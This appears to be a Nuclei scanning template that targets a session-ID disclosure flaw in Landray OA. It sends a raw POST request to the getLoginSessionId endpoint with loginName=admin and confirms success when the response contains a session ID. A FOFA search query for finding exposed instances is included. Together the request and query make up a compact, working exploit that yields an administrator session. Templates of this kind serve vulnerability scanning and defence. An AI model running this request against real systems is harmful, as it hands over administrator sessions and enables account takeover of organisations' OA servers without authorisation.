id: landray-oa-getLoginSessionId-disclosure
info:
  name: landray-oa-getLoginSessionId-disclosure
  author: leadlife
  severity: critical
  description: 蓝凌 OA getLoginSessionId.html - 敏感信息泄露
  reference: 
    - https://blog.csdn.net/luochen2436/article/details/135089437
  metadata:
    verified: true
    max-request: 1
    fofa-query : app='Landray-OA系统'
  tags: landray,disclosure,oa
  
http:
  - raw:
      - |+
        POST /api/sys-authentication/loginService/getLoginSessionId.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        loginName=admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "LoginSessionIdResult"
          - "sessionId"

      - type: status
        status:
          - 200